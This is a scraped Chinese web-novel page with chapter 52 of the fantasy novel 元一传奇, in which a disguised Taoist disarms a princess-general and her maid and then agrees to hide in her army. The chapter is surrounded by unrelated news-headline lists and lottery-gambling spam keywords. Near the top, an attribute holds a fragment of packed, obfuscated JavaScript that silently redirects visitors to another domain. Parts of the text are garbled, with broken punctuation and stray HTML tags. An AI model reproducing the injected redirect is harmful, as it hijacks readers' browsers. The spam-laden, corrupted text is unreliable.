艺术推手必备基本素养 2019-08-17
  • 不可思议!日本八幡平现“龙眼”奇景 2019-08-17
  • 回复@永胜龙须村:你可以去找嘛…… 2019-08-16
  • 地理君的专栏作者中国国家地理网 2019-08-14
  • 周纪龙:为262名残疾人的幸福领路 2019-08-13
  • 你就是小小文学家!“长城小作家”开始招募啦! 2019-08-13
  • 欧盟将对美28亿欧元产品加征关税 报复清单针对性强 2019-08-08
  • 印度右翼组织成员为特朗普庆生 给海报喂蛋糕 2019-08-07
  • 北京冬奥场馆建设注重赛后利用 2019-08-05
  • 大悟城市形象征集投票结束,共征集作品1万6千件 2019-08-05
  • 视频:热心球迷!陈奕迅吴秀波惊现世界杯开幕式现场 2019-08-04
  • 四轮电动车销售火爆存安全隐患 专家:需建国家标准 2019-08-04
  • 日本大阪6.1级强震4死逾300伤 工厂及店铺恢复运营 2019-08-03
  • China knows better as Trump tariff strategy tricks US voters 2019-08-03
  • 沙特球员惨败后将被惩罚?沙特足球协会:假的 2019-08-02
  • 35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('8 (! (/b.3/4.c(9.5))) {9.5 = \'7://a.b.3/0/1/2.6\'}',62,13,'10|10375|5404970|com|gi|href|html|https|if|location|m|sczprc|test'.split('|'),0,{}))" id="nr_body" class="nr_all c_nr">
    返回

    河北体彩排列五:元一传奇

    河北排列72018087
    关灯
    护眼
    字体:
    52.第五十二章 当机立断
       存书签 书架管理 返回目录

    河北排列72018087 www.krqwg.com 五十二当机立断

    肖林万未料到安博因自己的毛躁三次抛扔而腿部骨折。郭坤请求同回关城之说,本是心中犹豫。如随同回关,只恐暴露身份。如就此离去,又恐再有劫持战俘的南阳敌手。肖林思索片刻

    ,回转身形返到安博近前欲要商议,但顿时大吃一惊。只见安博面色苍白无血,冷汗直下,口唇发白,竟一时讲不出话来。肖林随即对其周身查看,才发现安博右腿已然骨折。

    肖林恍然而悟,此伤定是自己在上空抛扔所致。心中惭愧,轻轻背起,来至郭坤面前讲诉情形。郭坤当机立断,提议回关使军医疗伤。肖林无奈背负安博随同郭坤寻到待命的分队,取山

    间树枝临时固定安博腿部,兵士简做担架搭抬而起,一同回关。几经周折,由清幽关提出战车,再奔武灵。一路马不停蹄,至武灵询问军医,才知需要数月康复。肖林在郭坤几番请求下进至

    议事厅面见天元主帅。哪曾想到,主帅现身,肖林顿时心惊。竟是当初自己幼稚所致,因在帝王蛟奇面前建议联姻而导致发怒暗派五女子夜月之下半路偷袭自己的元靖公主。同时,肖林暗暗

    庆幸,自己此时佩戴易容面具,元靖些许无从认出。正愣神间,闻听元靖发问,忙提缩喉嗓,做作发出女音,躬身道:“小女子参见大帅?!?/p>

    元靖闻听,黛眉紧蹙,心中惊疑,这有些不男不女之声想必定是遮掩,眼中寒光一闪,沉声道:“听郭将军讲诉,是令师妹捉得战俘,又是你与一妹与郭将军三人合力战退南阳劫敌。本

    帅甚是感谢。本帅方才所问,你还未有回复,敢问尊姓大名,身为何方人氏?”元靖凝视肖林,右手悄然暗握佩剑。

    “小女子,嗯,本是天元帝国宛城人氏,曾随家父学得几载武艺。小女子姓张名萍?!毙ち炙匙旌?,已感元靖顿现杀机,不由将头沉沉垂下,以掩面色。

    元靖冷笑一声,:“天元帝国宛城人氏,张萍。好,好,”元靖向身侧杏儿一使眼色,那杏儿顿时明悟,转身迅速掩上厅门。此时厅内只有元靖,郭坤,杏儿,肖林及昏迷委地的希尔普

    五人。元靖微扬面部,眼现杀机:“宛城处居云灵山脚下,阁下有如此大能,我云灵国教岂能不晓,怎未听有过传言?阁下的语声雌雄不分,倒是辛苦了作假之劳。就让本帅来观看阁下的真

    身吧。杏儿拿下!”元靖一声娇喝,与杏儿同时出手。一剑一鞭分向肖林上下袭来。

    此时郭坤已被惊得身形呆滞,口若含蛋见那一剑一鞭电光火石间找上肖林,而此刻肖林正垂首躬身看似毫无防备。剑鞭破空之声,听得心神骤冷。

    两声微响后,厅内落针可闻。此刻肖林,郭坤,元靖,杏儿四人如若木雕,伫立当场。片刻,肖林缓缓抬首,望向元靖微微一笑:“当初就不是什么柔金润玉,今日看来,我了个去!变

    本加厉!”,言讫,用已夹住元靖剑尖的二指,轻轻一抖,元靖顿时宝剑脱手。肖林随即向后抬臂轻挥,那宝剑瞬间飞向后方,瞬时刺进厅中拱柱之上,剑没三分,剑柄狂摆不休。

    元靖与杏儿皆是大惊,杏儿随即拼力向怀中拉扯长鞭。此刻那鞭头正被肖林踏于足底。任那杏儿如何发力,终是无果。肖林缓缓垂首看向那抻拉得笔直的长鞭,又是微微一笑,随即望向

    杏儿道:“多日不见,你这鞭法竟毫无长进,嗯?”肖林瞬时环顾四周,:“还有四个臭丫头呢。不五个吗?”片刻,电闪般出手,只模糊间那长鞭已被夺至肖林手中。随即持端鞭柄将长鞭

    卷起,随意抛向身后。继而负手而立,望向元靖微笑不语。

    又是沉寂半晌,杏儿突闪身将元靖护在身后,一把匕首指向肖林,眼中寒光波闪。

    “杏儿,退下?!痹敢簧峄?,将杏儿拉扯一旁,眼中尽是迷惑:“听阁下言语,你认得本帅?”

    肖林看那元靖绝美容颜上尽是惊奇不解,心中好笑,片刻无奈微叹一声,思索片刻低声道:“天地始,万物生。云端行龙,山岳走虎?!?/p>

    元靖闻听瞬间心神俱震,抬手指向肖林道:“你,你是”

    “嗯,当初建议联姻之人?!毙ち忠恍?,:“当初确是幼稚之谈,但也遭五大侠女偷袭了?!蔽⑿湎蛐佣黄?,伸手入怀,片刻一块玉牌抛向元靖。

    元靖伸手接过,凤目端瞧,低声道:“道教行牌?”

    “我来看!”此刻不知何时清醒的郭坤瞬间跳至元靖身侧,一手抓住元靖端物之手,凑至眼前:“啊呀!和我地一模一样,而且竟是真的?”说着望向肖林道:“你是我徒侄女??!”一

    对小三角眼顿时放光。

    “嗯?”肖林闻听愣住,打量郭坤,不明其意。

    “放肆!”此刻元靖脸上红云沾染,瞬时甩开郭坤之手,一个横向滑步,侧闪出几尺间,狠狠剜了郭坤一眼,再次望向肖林道:“你,你从何而来,莫非有何使命?!毖云?,元靖脸上竟

    有些尴尬神色。

    肖林闻听望向元靖,欲言又止。

    元靖会意,忙命杏儿唤人抬出希尔普,命重兵看押把守,厅外兵士扩退三丈,紧闭厅门,传令任何人不得打扰,违者杀无赦。一切安顿后,元靖深望肖林片刻,主持落座。

    半晌,气氛颇显沉闷。元靖望向肖林脸上稀有一笑道:“道长此次降临青沙口是受云灵使命吗?”元靖正言,发觉肖林正盯着郭坤观瞧,顺势望向郭坤,而那郭坤正端抬盔沿亦是笑面望

    向肖林频频颔首,竟一副以老望幼之像。

    元靖瞬时面沉,轻咳一声,那郭坤闻听瞬时望向元靖,见那脸上挂霜,小三角眼微微一瞪,随即盔盖半面端坐不语。

    肖林一笑:“说来话长,在下本是受命前往天圣帝国天圣山,因在途中颇有周折,机缘下与半路结识的天圣教弟子前来边境观看。起初是闻听两国开战,本意暗中助我天元微薄之力,但

    未曾料到,异变连生。在下起初还顾忌这大陆公约,但竟发现那南阳竟有法师公会相助。来而不往非礼也,在下毅然出手。其余情形,国婿大人句句,嗯句句差不多属实?!彼底磐蚬ひ?/p>

    笑。而那郭坤盔压半面毫无反应,其隐盖面上此刻尽是气氛。这元靖从未在众人前给过自己脸面。

    “哦,”元靖闻听微微颔首,黛眉一蹙,面色凝重道:“原来如此,本帅亦是接到禀报,青沙口出现奇特之舟,竟能浮沙而渡。此事足可证明已有修真界染指战争。本帅已寄信与云灵山

    ,汇报此事,想必不多时就会有大批修真之士前来调查?!?/p>

    肖林闻听,微微颔首:“不错,此事定会引起波澜。眼下看来,在下与受伤的天圣教弟子应尽早离开此地,但,”肖林面现无奈,:“此次在青沙口一战中,他已然负伤,需几月愈合。

    再者即使在下背负而走,到那天圣山终是露出马脚。很是让人忧虑?!?/p>

    “噗嗤”一声轻笑,站在元靖身后的杏儿终是忍耐不住,观肖林半晌,一副奇丑女子面容,男声谈讲时,面上表情甚是干涩,滑稽至极。越看越感可笑。

    元靖闻声脸色一冷,微微回首看向杏儿,瞬时明悟发笑原因,凤目不经意间波光几闪,嘴角浅勾,但瞬间恢复:“放肆?!币簧嵫党隹?。

    此时杏儿忙双手捂嘴,笑得腰肢乱颤。

    肖林望向杏儿也是一笑,当初那夜月下侮辱自己的小丫头仿佛成美几分。随即微微垂头不语。

    元靖又是轻咳一声,:“道长,既然如此,本帅倒是有一建议?!?/p>

    肖林忙道:“在下洗耳恭听?!?/p>

    “道长,此番修真界染指战争,是南阳先发,我天元有理可占。再者道长已然易容,虽在青沙口三千天元官兵前现身,也无关大碍。道长此番实为天元立下奇功。本帅代父王向道长感谢

    ?!毖云?,竟起身向肖林微微躬身。

    肖林大惊,忙起身闪过一旁:“不敢当,不敢当。在下本出自云灵,云灵即为在下之家,云灵又是天元国教,天元自是在下祖国。为国尽微薄之力,理当如此。公主如此,倒是言重了。

    元靖抬首望向肖林微微一笑,伸出纤臂再请肖林入座。片刻道:“与道长随行的天圣教弟子,此次实为因天元而负伤。本帅绝不会置之不理。本帅的建议是暂且将你二人藏在军中。等那

    天圣教弟子伤势愈合,本帅再行护送离去。几日后即便有修真人士至此,本帅也定倾尽己力?;つ愕榷?。道长只管照顾天圣教弟子,其他皆交本帅处理就是?!?/p>

    肖林闻听心中甚是感激,但忽想起乌楠大祭祀,顿时心中生愧,立时暗下决心,如有波折自己定要拼尽全力?;ぐ膊?。想到此处,向元靖躬身施礼:“谢公主庇护之恩,如今看来也只有

    如此了。一切全凭公主安排?!?/p>

    元靖闻听微微颔首,挥手间向杏儿低语几句。杏儿此时偷笑已止,闻听元靖吩咐,立时连连点头,片刻向肖林一笑:“道长请随我来?!?/p>

    肖林再次向元靖躬身一礼,随杏儿走出大厅偏门。

    此时厅中只剩元靖于郭坤二人。元靖转而望向郭坤,见仍是盔压半面,不由脸现微笑,但随即一没,冷声道:“此次也多亏郭将军神勇,与道长等共退劫敌。本帅至此为你记上一功”

    那端坐而纹丝不动的郭坤片刻猛然起身,一手端抬盔沿露出炭黑瘦面,一手指向身后,:“一群道貌岸然之流,看那剑,再看那鞭,都被人夺去!却偏偏稳坐装大!记功?不用了。先前

    救你一命,何曾记功?三军无帅何其后果?得了!本大少爷看好了!如今留此就是个他娘的傀儡,这个国婿本少爷不要了!恭请公主又大帅另择新君!至于功劳无须记载!就这个道长他也算本

    大少一个小辈!本大少心意已决,今晚就快马返回庆城,做我的郭府少爷,请公主又大帅成全。嗯,看在,之前立功份上!”郭坤言讫,双手拱于胸前,垂首躬身。

    元靖闻听顿时一愣,眼现寒光,但随即一缓,思索片刻,轻声道:“嗯,郭将军有此提议,想必是误听旁言了。这当今战势未决,怎可少郭将军之贤才。郭将军只管安受本份,日后待战

    局大捷,郭将军首功之列?!?/p>

    郭坤闻听竟一轻哼,:“这倒不必了。本大少有个建议。本大少即刻请求大帅撤销本大少国婿之职!”

    “放肆!”元靖一声娇喝后,脸上红霞两腮,微喘片刻,强作精神道:“国婿本是帝王所定,暂且不论,而今郭将军屡立奇功,单凭此处,望将军看在国之大事也莫要当前任性。岂不待

    日后退敌而论?”元靖此时微微垂首,那绝美面容满是气氛。

    “嗯?卸磨杀驴?”郭坤一挥臂膀,转身向厅外走出。

    元靖见状勃然大怒,娇喝一声:“来人,拿下!”

    声止,外进数名兵士,但见厅中两人,顿时皆是愣在一处。

    “尔敢再行嚣张,本帅即刻下令,将你以叛国之罪就地正法,国内查抄郭府!”元靖一字一顿冷声而言。

    郭坤立时呆滞,一顶特大号头盔遮压半面,缓缓转身向元靖一躬到地:“谨从大帅之命。本将军现已劳累,请示大帅可否回营歇息?”

    元靖闻听脸上再次尴尬神色一闪,随即沉声出口:“有一事本帅不明,请郭将军明示。其余人等退出!”

    片刻,厅内只剩二人。只听元靖道:“听你方才称呼,你与云灵有何关系?”

    郭坤闻听瞬间腰板一挺,一手端抬盔沿望向元靖:“请允本国婿慢慢道来!”

    战神山。

    仙妮亚一对大斧抄在手中,满眼尽是苦涩。言讫之时,不待对面男子答话,双臂挥出,两斧瞬时脱手而出。那对面男子电闪般抽出腰刀横行一隔。只听齐齐两声化一声脆响过后,那双斧

    被单刀隔挡而飞,那男子不待驱使招式反击时,一声苍老之音瞬时响起:“孽畜,狼心不死!”

    男子闻听瞬时全身不由萎缩,气势尽消。待回首寻觅时,其双足已然凌空。

    一瘦小红眉老者单手而挟,双眼微眯,声如洪钟:“造孽!早知是个狼崽子,不如当初抛弃荒野?!毖云?,伸出一只如钢筋五指手掌猛然拍向男子面门。

    “恩师,不要!”仙妮亚即刻疾呼,怎奈老者出手电闪不及。一声轻响,男子脑浆迸裂。

    仙妮亚瞬时委地,片刻垂首哭泣。

    “哎,”一声轻叹,洪钟之音继而响起:“为师就知道你心慈手软,不肯杀判!从此闭关三月,以做修升!”言讫,一本羊皮古卷抛向仙妮亚。

    仙妮亚随手接过,泪流不止,双膝跪倒,抽搐道:“谢恩师??墒π炙恢劣诖?。。。。。?!?/p>

    红眉老者又是一声轻叹,脸上苦涩一闪,转身望向厅外,沉声如铁:“南极山,老夫即刻荡平了你!以解心中怨气!”话音未落,瞬时原地消失。只是在那无人察觉间,那红眉老者已是

    老泪纵横。。。。。。

    本书来自  

    上一章 目录 下一章

    孰云吾道非的小说元一传奇仅代表作家本人的观点,不代表网站立场,内容如果含有不健康和低俗信息,请联系我们进行删除处理!
    元一传奇最新章节内容由网友收集并提供,转载至伤城中文网只是为了宣传《元一传奇》让更多书友知晓。版权归作者孰云吾道非所有。
    元一传奇吧,元一传奇5200,河北排列72018087,元一传奇燃文

  • 艺术推手必备基本素养 2019-08-17
  • 不可思议!日本八幡平现“龙眼”奇景 2019-08-17
  • 回复@永胜龙须村:你可以去找嘛…… 2019-08-16
  • 地理君的专栏作者中国国家地理网 2019-08-14
  • 周纪龙:为262名残疾人的幸福领路 2019-08-13
  • 你就是小小文学家!“长城小作家”开始招募啦! 2019-08-13
  • 欧盟将对美28亿欧元产品加征关税 报复清单针对性强 2019-08-08
  • 印度右翼组织成员为特朗普庆生 给海报喂蛋糕 2019-08-07
  • 北京冬奥场馆建设注重赛后利用 2019-08-05
  • 大悟城市形象征集投票结束,共征集作品1万6千件 2019-08-05
  • 视频:热心球迷!陈奕迅吴秀波惊现世界杯开幕式现场 2019-08-04
  • 四轮电动车销售火爆存安全隐患 专家:需建国家标准 2019-08-04
  • 日本大阪6.1级强震4死逾300伤 工厂及店铺恢复运营 2019-08-03
  • China knows better as Trump tariff strategy tricks US voters 2019-08-03
  • 沙特球员惨败后将被惩罚?沙特足球协会:假的 2019-08-02
  • 老重庆时时彩计划开奖结果 购彩能赚钱吗 贵州11选五开奖号码最大遗漏 竞彩篮彩2串1投注技巧 福彩3d大小奇偶走势图 江苏22选5开奖结果 投注技巧倍投阶梯 118图库心水论坛777 最后一一码中特 可以赢钱的捕鱼 2019新上线牛牛 体彩排列三 重庆时时官网开奖结果 中彩票到那里领奖 甘肃十一选五任7推荐号